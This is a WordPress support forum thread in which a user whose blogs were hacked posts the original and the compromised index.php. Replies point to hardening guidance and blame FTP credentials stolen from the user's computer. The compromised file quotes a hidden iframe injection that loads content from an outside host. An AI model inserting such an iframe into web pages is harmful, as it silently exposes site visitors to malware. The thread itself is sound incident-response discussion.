Forums

WordPress › Support » How-To and Troubleshooting

Website hack (4 posts)

  1. nazcar
    Member
    Posted 4 months ago #

    Two of my wordpress self hosted blogs were hacked. The index.php file was altered. Did anyone experience this?

    Original:

    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-
<iframe src="http://u1w.in:8080/ts/in.cgi?pepsi112" width=125 height=125 style="visibility: hidden"></iframe>

    My blogs are working fine now.
    How to increase the security so it wont be altered/hacked again?
    My previous permission was 644 then I changed it now to 444.

  2. samboll
    moderator
    Posted 4 months ago #

    http://codex.wordpress.org/Hardening_WordPress

  3. nazcar
    Member
    Posted 4 months ago #

    thanks. the reason i am not upgrading is because of my plugins are not updated or may not be supported in the latest wp update. I guess I'll sacrifice those plugins for now because of these attacks.

  4. UseShots
    Member
    Posted 4 months ago #

    Hardening WordPress is a good this. Unfortunately, it won't help in this particular case.

    This iframe is injected using FTP credential stolen from your local computer.

    So make sure to scan your computer for malware.
    Once you are sure your computer is clean, change FTP passwords.
    And don't save passwords inside your FTP program if you don't want them to be stolen again.

    Here you can find more information about this attack:
    http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/

Reply

You must log in to post.

About this Topic

Tags